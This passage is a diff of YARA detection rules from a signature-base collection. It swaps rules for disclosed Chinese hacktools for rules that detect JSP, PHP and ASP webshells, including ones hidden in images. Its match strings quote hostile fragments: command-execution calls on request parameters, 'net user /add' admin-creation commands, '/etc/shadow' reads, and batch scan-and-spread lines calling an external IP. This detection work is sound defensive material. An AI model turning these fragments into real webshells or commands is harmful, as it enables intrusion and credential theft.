+		$cjsp_long7 = "< %" ascii wide
+		$input1 = "getParameter" fullword ascii wide
+		$input2 = "getHeaders" fullword ascii wide
+		$input3 = "getInputStream" fullword ascii wide
+		$input4 = "getReader" fullword ascii wide
+		$req1 = "request" fullword ascii wide
+		$req2 = "HttpServletRequest" fullword ascii wide
+		$req3 = "getRequest" fullword ascii wide
 
 	condition:
-		6 of them
+		filesize < 30KB and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( any of ( $input* ) and any of ( $req* ) ) and 4 of ( $scan* ) and 1 of ( $write* ) and $http
 }
-rule SIGNATURE_BASE_Hacktools_CN_Panda_445TOOL
+rule SIGNATURE_BASE_WEBSHELL_JSP_By_String : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file 445TOOL.rar"
-		author = "Florian Roth (Nextron Systems)"
-		id = "02075631-49cc-5b97-ad8e-92d734a26d34"
-		date = "2014-11-17"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1131-L1147"
+		description = "JSP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions."
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8d64e40b-5583-5887-afe1-b926d9880913"
+		date = "2021-01-09"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L6247-L6344"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "92050ba43029f914696289598cf3b18e34457a11"
-		logic_hash = "69a17bf7735eea946a5326d9535e68b8f010f2a0229875970b1bb15029c6dc4e"
-		score = 60
-		quality = 85
-		tags = ""
+		hash = "e9060aa2caf96be49e3b6f490d08b8a996c4b084"
+		hash = "4c2464503237beba54f66f4a099e7e75028707aa"
+		hash = "06b42d4707e7326aff402ecbb585884863c6351a"
+		hash = "dada47c052ec7fcf11d5cfb25693bc300d3df87de182a254f9b66c7c2c63bf2e"
+		hash = "f9f6c696c1f90df6421cd9878a1dec51a62e91b4b4f7eac4920399cb39bc3139"
+		hash = "f1d8360dc92544cce301949e23aad6eb49049bacf9b7f54c24f89f7f02d214bb"
+		hash = "1d1f26b1925a9d0caca3fdd8116629bbcf69f37f751a532b7096a1e37f4f0076"
+		hash = "850f998753fde301d7c688b4eca784a045130039512cf51292fcb678187c560b"
+		logic_hash = "794013918e7dbd48d658bb9ec0c7d458905d7263320d89b17d2b144e53f9258b"
+		score = 75
+		quality = 19
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "scan.bat" fullword ascii
-		$s1 = "Http.exe" fullword ascii
-		$s2 = "GOGOGO.bat" fullword ascii
-		$s3 = "ip.txt" fullword ascii
+		$jstring1 = "<title>Boot Shell</title>" wide ascii
+		$jstring2 = "String oraPWD=\"" wide ascii
+		$jstring3 = "Owned by Chinese Hackers!" wide ascii
+		$jstring4 = "AntSword JSP" wide ascii
+		$jstring5 = "JSP Webshell</" wide ascii
+		$jstring6 = "motoME722remind2012" wide ascii
+		$jstring7 = "EC(getFromBase64(toStringHex(request.getParameter(\"password" wide ascii
+		$jstring8 = "http://jmmm.com/web/index.jsp" wide ascii
+		$jstring9 = "list.jsp = Directory & File View" wide ascii
+		$jstring10 = "jdbcRowSet.setDataSourceName(request.getParameter(" wide ascii
+		$jstring11 = "Mr.Un1k0d3r RingZer0 Team" wide ascii
+		$jstring12 = "MiniWebCmdShell" fullword wide ascii
+		$jstring13 = "pwnshell.jsp" fullword wide ascii
+		$jstring14 = "session set &lt;key&gt; &lt;value&gt; [class]<br>" wide ascii
+		$jstring15 = "Runtime.getRuntime().exec(request.getParameter(" nocase wide ascii
+		$jstring16 = "GIF98a<%@page" wide ascii
+		$jstring17 = "Tas9er" fullword wide ascii
+		$jstring18 = "uu0028\\u" wide ascii
+		$jstring19 = "uu0065\\u" wide ascii
+		$jstring20 = "uu0073\\u" wide ascii
+		$jstring21 = /\\uuu{0,50}00/ wide ascii
+		$jstring22 = /[\w\.]\\u(FFFB|FEFF|FFF9|FFFA|200C|202E|202D)[\w\.]/ wide ascii
+		$jstring23 = "\"e45e329feb5d925b\"" wide ascii
+		$jstring24 = "u<![CDATA[n" wide ascii
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
+		$dex = { 64 65 ( 78 | 79 ) 0a 30 }
+		$pack = { 50 41 43 4b 00 00 00 02 00 }
 
 	condition:
-		all of them
+		not ( uint16( 0 ) == 0x5a4d or $dex at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and ( ( filesize < 100KB and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and any of ( $jstring* ) ) or ( filesize < 500KB and ( #jstring21 > 20 or $jstring18 or $jstring19 or $jstring20 ) ) )
 }
-rule SIGNATURE_BASE_Hacktools_CN_Panda_445
+rule SIGNATURE_BASE_WEBSHELL_JSP_Input_Upload_Write : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file 445.rar"
-		author = "Florian Roth (Nextron Systems)"
-		id = "02075631-49cc-5b97-ad8e-92d734a26d34"
-		date = "2014-11-17"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1149-L1169"
+		description = "JSP uploader which gets input, writes files and contains \"upload\""
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "bbf26edd-88b7-5ec5-a16e-d96a086dcd19"
+		date = "2021-01-24"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L6346-L6406"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a61316578bcbde66f39d88e7fc113c134b5b966b"
-		logic_hash = "d3f5b2c601dfa1702bbd1f8bdc1f847dd34ba84a6c527a3e02cdb76075e4ad2c"
-		score = 60
-		quality = 85
-		tags = ""
+		hash = "ef98ca135dfb9dcdd2f730b18e883adf50c4ab82"
+		hash = "583231786bc1d0ecca7d8d2b083804736a3f0a32"
+		hash = "19eca79163259d80375ebebbc440b9545163e6a3"
+		logic_hash = "33b08a6118134819ec72a2eab0daf723c25c8869e0fa8a83f690b93e2667d15c"
+		score = 75
+		quality = 46
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "for /f %%i in (ips.txt) do (start cmd.bat %%i)" fullword ascii
-		$s1 = "445\\nc.exe" fullword ascii
-		$s2 = "445\\s.exe" fullword ascii
-		$s3 = "cs.exe %1" fullword ascii
-		$s4 = "445\\cs.exe" fullword ascii
-		$s5 = "445\\ip.txt" fullword ascii
-		$s6 = "445\\cmd.bat" fullword ascii
-		$s9 = "@echo off" fullword ascii
+		$upload = "upload" nocase wide ascii
+		$write1 = "os.write" fullword wide ascii
+		$write2 = "FileOutputStream" fullword wide ascii
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
+		$input1 = "getParameter" fullword ascii wide
+		$input2 = "getHeaders" fullword ascii wide
+		$input3 = "getInputStream" fullword ascii wide
+		$input4 = "getReader" fullword ascii wide
+		$req1 = "request" fullword ascii wide
+		$req2 = "HttpServletRequest" fullword ascii wide
+		$req3 = "getRequest" fullword ascii wide
 
 	condition:
-		all of them
+		filesize < 10KB and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( any of ( $input* ) and any of ( $req* ) ) and $upload and 1 of ( $write* )
 }
-rule SIGNATURE_BASE_Hacktools_CN_Wineggdrop
+rule SIGNATURE_BASE_WEBSHELL_Generic_OS_Strings : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file s.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9b6244ee-5ace-5caa-bfa2-732bcfcfc998"
-		date = "2014-11-17"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1171-L1194"
+		description = "typical webshell strings"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ea85e415-4774-58ac-b063-0f5eb535ec49"
+		date = "2021-01-12"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L6408-L6577"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7665011742ce01f57e8dc0a85d35ec556035145d"
-		logic_hash = "6123a07038e30e11e37a70b912a1c854c13341e67eaf4ed14ca9954288a42d62"
-		score = 60
-		quality = 85
-		tags = ""
+		hash = "d5bfe40283a28917fcda0cefd2af301f9a7ecdad"
+		hash = "fd45a72bda0a38d5ad81371d68d206035cb71a14"
+		hash = "b4544b119f919d8cbf40ca2c4a7ab5c1a4da73a3"
+		hash = "569259aafe06ba3cef9e775ee6d142fed6edff5f"
+		hash = "48909d9f4332840b4e04b86f9723d7427e33ac67"
+		hash = "0353ae68b12b8f6b74794d3273967b530d0d526f"
+		logic_hash = "10b956cac601c97d1483d35a7730d7178c4175800b4e4c9ed62ad583d3cac3d7"
+		score = 50
+		quality = -98
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "Normal Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii
-		$s2 = "SYN Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii
-		$s6 = "Example: %s TCP 12.12.12.12 12.12.12.254 21 512 /Banner" fullword ascii
-		$s8 = "Something Wrong About The Ports" fullword ascii
-		$s9 = "Performing Time: %d/%d/%d %d:%d:%d --> " fullword ascii
-		$s10 = "Example: %s TCP 12.12.12.12/24 80 512 /T8 /Save" fullword ascii
-		$s12 = "%u Ports Scanned.Taking %d Threads " fullword ascii
-		$s13 = "%-16s %-5d -> \"%s\"" fullword ascii
-		$s14 = "SYN Scan Can Only Perform On WIN 2K Or Above" fullword ascii
-		$s17 = "SYN Scan: About To Scan %s:%d Using %d Thread" fullword ascii
-		$s18 = "Scan %s Complete In %d Hours %d Minutes %d Seconds. Found %u Open Ports" fullword ascii
+		$fp1 = "http://evil.com/" wide ascii
+		$fp2 = "denormalize('/etc/shadow" wide ascii
+		$fp3 = "vim.org>"
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
+		$cjsp_short1 = "<%" ascii wide
+		$cjsp_short2 = "%>" wide ascii
+		$cjsp_long1 = "<jsp:" ascii wide
+		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp_long3 = "/jstl/core" ascii wide
+		$cjsp_long4 = "<%@p" nocase ascii wide
+		$cjsp_long5 = "<%@ " nocase ascii wide
+		$cjsp_long6 = "<% " ascii wide
+		$cjsp_long7 = "< %" ascii wide
+		$w1 = "net localgroup administrators" nocase wide ascii
+		$w2 = "net user" nocase wide ascii
+		$w3 = "/add" nocase wide ascii
+		$l1 = "/etc/shadow" wide ascii
+		$l2 = "/etc/ssh/sshd_config" wide ascii
+		$take_two1 = "net user" nocase wide ascii
+		$take_two2 = "/add" nocase wide ascii
 
 	condition:
-		5 of them
+		filesize < 70KB and ( ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) or ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) or ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) ) and ( filesize < 300KB and not uint16( 0 ) == 0x5a4d and ( all of ( $w* ) or all of ( $l* ) or 2 of ( $take_two* ) ) ) and not any of ( $fp* )
 }
-rule SIGNATURE_BASE_Hacktools_CN_Scan_BAT
+rule SIGNATURE_BASE_WEBSHELL_In_Image : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file scan.bat"
-		author = "Florian Roth (Nextron Systems)"
-		id = "836e0618-93c7-5519-bbc4-705ff5c2e127"
-		date = "2014-11-17"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1196-L1214"
+		description = "Webshell in GIF, PNG or JPG"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b1185b69-9b08-5925-823a-829fee6fa4cf"
+		date = "2021-02-27"
+		modified = "2024-03-11"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L6579-L6839"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6517d7c245f1300e42f7354b0fe5d9666e5ce52a"
-		logic_hash = "eed941d2ad5d33d7224504b08d2104d4043fab7a2ff027fc54cd1afd42e32549"
-		score = 60
-		quality = 85
-		tags = ""
+		hash = "d4fde4e691db3e70a6320e78657480e563a9f87935af873a99db72d6a9a83c78"
+		hash = "84938133ee6e139a2816ab1afc1c83f27243c8ae76746ceb2e7f20649b5b16a4"
+		hash = "52b918a64afc55d28cd491de451bb89c57bce424f8696d6a94ec31fb99b17c11"
+		logic_hash = "e7e78107c661aa5124a37b8e492986e5a3da63c79c97c4dc3199e648a5aa4aa8"
+		score = 55
+		quality = -167
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		importance = 70
 
 	strings:
-		$s0 = "for /f %%a in (host.txt) do (" ascii
-		$s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii
-		$s2 = "del host.txt /q" fullword ascii
-		$s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
-		$s4 = "start Http.exe %%a %http%" fullword ascii
-		$s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii
+		$png = { 89 50 4E 47 }
+		$jpg = { FF D8 FF E0 }
+		$gif = "GIF8" wide ascii
+		$gif2 = "gif89"
+		$gif3 = "Gif89"
+		$mdb = { 00 01 00 00 53 74 }
+		$php_short = "<?" wide ascii
+		$no_xml1 = "<?xml version" nocase wide ascii
+		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
+		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
+		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
+		$no_pdf = "<?xpacket"
+		$php_new1 = /<\?=[^?]/ wide ascii
+		$php_new2 = "<?php" nocase wide ascii
+		$php_new3 = "<script language=\"php" nocase wide ascii
+		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload5 = /\bsystem[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
+		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
+		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
+		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
+		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
+		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
+		$m_cpayload_preg_filter2 = "'|.*|e'" nocase wide ascii
+		$php_multi_write1 = "fopen(" wide ascii
+		$php_multi_write2 = "fwrite(" wide ascii
+		$php_write1 = "move_uploaded_file" fullword wide ascii
+		$cjsp1 = "<%" ascii wide
+		$cjsp2 = "<jsp:" ascii wide
+		$cjsp3 = /language=[\"']java[\"\']/ ascii wide
+		$cjsp4 = "/jstl/core" ascii wide
+		$payload1 = "ProcessBuilder" fullword ascii wide
+		$payload2 = "processCmd" fullword ascii wide
+		$rt_payload1 = "Runtime" fullword ascii wide
+		$rt_payload2 = "getRuntime" fullword ascii wide
+		$rt_payload3 = "exec" fullword ascii wide
+		$tagasp_short1 = /<%[^"]/ wide ascii
+		$tagasp_short2 = "%>" wide ascii
+		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
+		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
+		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
+		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
+		$tagasp_long10 = "<%@ " wide ascii
+		$tagasp_long11 = /<% \w/ nocase wide ascii
+		$tagasp_long12 = "<%ex" nocase wide ascii
+		$tagasp_long13 = "<%ev" nocase wide ascii
+		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
+		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
+		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
+		$php1 = "<?php"
+		$php2 = "<?="
+		$jsp1 = "=\"java." wide ascii
+		$jsp2 = "=\"javax." wide ascii
+		$jsp3 = "java.lang." wide ascii
+		$jsp4 = "public" fullword wide ascii
+		$jsp5 = "throws" fullword wide ascii
+		$jsp6 = "getValue" fullword wide ascii
+		$jsp7 = "getBytes" fullword wide ascii
+		$perl1 = "PerlScript" fullword
+		$asp_payload0 = "eval_r" fullword nocase wide ascii
+		$asp_payload1 = /\beval\s/ nocase wide ascii
+		$asp_payload2 = /\beval\(/ nocase wide ascii
+		$asp_payload3 = /\beval\"\"/ nocase wide ascii
+		$asp_payload4 = /:\s{0,10}eval\b/ nocase wide ascii
+		$asp_payload8 = /\bexecute\s?\(/ nocase wide ascii
+		$asp_payload9 = /\bexecute\s[\w"]/ nocase wide ascii
+		$asp_payload11 = "WSCRIPT.SHELL" fullword nocase wide ascii
+		$asp_payload13 = "ExecuteGlobal" fullword nocase wide ascii
+		$asp_payload14 = "ExecuteStatement" fullword nocase wide ascii
+		$asp_payload15 = "ExecuteStatement" fullword nocase wide ascii
+		$asp_multi_payload_one1 = "CreateObject" nocase fullword wide ascii
+		$asp_multi_payload_one2 = "addcode" fullword wide ascii
+		$asp_multi_payload_one3 = /\.run\b/ wide ascii
+		$asp_multi_payload_two1 = "CreateInstanceFromVirtualPath" fullword wide ascii
+		$asp_multi_payload_two2 = "ProcessRequest" fullword wide ascii
+		$asp_multi_payload_two3 = "BuildManager" fullword wide ascii
+		$asp_multi_payload_three1 = "System.Diagnostics" wide ascii
+		$asp_multi_payload_three2 = "Process" fullword wide ascii
+		$asp_multi_payload_three3 = ".Start" wide ascii
+		$asp_multi_payload_four1 = "CreateObject" fullword nocase wide ascii
+		$asp_multi_payload_four2 = "TransformNode" fullword nocase wide ascii
+		$asp_multi_payload_four3 = "loadxml" fullword nocase wide ascii
+		$asp_multi_payload_five1 = "ProcessStartInfo" fullword nocase wide ascii
+		$asp_multi_payload_five2 = ".Start" nocase wide ascii
+		$asp_multi_payload_five3 = ".Filename" nocase wide ascii
+		$asp_multi_payload_five4 = ".Arguments" nocase wide ascii
+		$asp_always_write1 = /\.write/ nocase wide ascii
+		$asp_always_write2 = /\.swrite/ nocase wide ascii
+		$asp_write_way_one2 = "SaveToFile" fullword nocase wide ascii
+		$asp_write_way_one3 = "CREAtEtExtFiLE" fullword nocase wide ascii
+		$asp_cr_write1 = "CreateObject(" nocase wide ascii
+		$asp_cr_write2 = "CreateObject (" nocase wide ascii
+		$asp_streamwriter1 = "streamwriter" fullword nocase wide ascii
+		$asp_streamwriter2 = "filestream" fullword nocase wide ascii
 
 	condition:
-		5 of them
+		filesize < 5MB and ( $png at 0 or $jpg at 0 or $gif at 0 or $gif at 3 or $gif2 at 0 or $gif2 at 3 or $gif3 at 0 or $mdb at 0 ) and ( ( ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) or ( any of ( $php_write* ) or all of ( $php_multi_write* ) ) ) ) or ( ( any of ( $cjsp* ) ) and ( 1 of ( $payload* ) or all of ( $rt_payload* ) ) ) or ( ( ( any of ( $tagasp_long* ) or any of ( $tagasp_classid* ) or ( $tagasp_short1 and $tagasp_short2 in ( filesize -100 .. filesize ) ) or ( $tagasp_short2 and ( $tagasp_short1 in ( 0 .. 1000 ) or $tagasp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not ( ( any of ( $perl* ) or $php1 at 0 or $php2 at 0 ) or ( ( #jsp1 + #jsp2 + #jsp3 ) > 0 and ( #jsp4 + #jsp5 + #jsp6 + #jsp7 ) > 0 ) ) ) and ( ( any of ( $asp_payload* ) or all of ( $asp_multi_payload_one* ) or all of ( $asp_multi_payload_two* ) or all of ( $asp_multi_payload_three* ) or all of ( $asp_multi_payload_four* ) or all of ( $asp_multi_payload_five* ) ) or ( any of ( $asp_always_write* ) and ( any of ( $asp_write_way_one* ) and any of ( $asp_cr_write* ) ) or ( any of ( $asp_streamwriter* ) ) ) ) ) )
 }
-rule SIGNATURE_BASE_Hacktools_CN_Panda_Burst
+rule SIGNATURE_BASE_WEBSHELL_Mixed_OBFUSC : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file Burst.rar"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e07c66d1-958e-5ad2-9d5b-380d48af8360"
-		date = "2014-11-17"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L1216-L1229"
+		description = "Detects webshell with mixed obfuscation commands"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "dcb4054b-0c87-5cd0-9297-7fd5f2e37437"
+		date = "2023-01-28"
+		modified = "2023-04-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L6841-L6865"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ce8e3d95f89fb887d284015ff2953dbdb1f16776"
-		logic_hash = "c334019cab377f4d96f5daee6a2f1fa7e24ecc43b3aee1eb76537640fdfd8a97"
-		score = 60
+		logic_hash = "76cc6390cbdb81055c72edb124db2bf52e3d0b975406367a9c49a0ee6621d30b"
+		score = 50
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8c4e5c6bdfcc86fa27bdfb075a7c9a769423ec6d53b73c80cbc71a6f8dd5aace"
+		hash2 = "78f2086b6308315f5f0795aeaa75544128f14889a794205f5fc97d7ca639335b"
+		hash3 = "3bca764d44074820618e1c831449168f220121698a7c82e9909f8eab2e297cbd"
+		hash4 = "b26b5e5cba45482f486ff7c75b54c90b7d1957fd8e272ddb4b2488ec65a2936e"
+		hash5 = "e217be2c533bfddbbdb6dc6a628e0d8756a217c3ddc083894e07fd3a7408756c"
+		importance = 70
 
 	strings:
-		$s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr." ascii
+		$s1 = "rawurldecode/*" ascii
+		$s2 = "preg_replace/*" ascii
+		$s3 = " __FILE__/*" ascii
+		$s4 = "strlen/*" ascii
+		$s5 = "str_repeat/*" ascii
+		$s6 = "basename/*" ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x3f3c and filesize < 200KB and ( 4 of them ) )
 }
-rule SIGNATURE_BASE_Hacktools_CN_445_Cmd : FILE
+rule SIGNATURE_BASE_WEBSHELL_Cookie_Post_Obfuscation : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file cmd.bat"
-		author = "Florian Roth (Nextron Systems)"
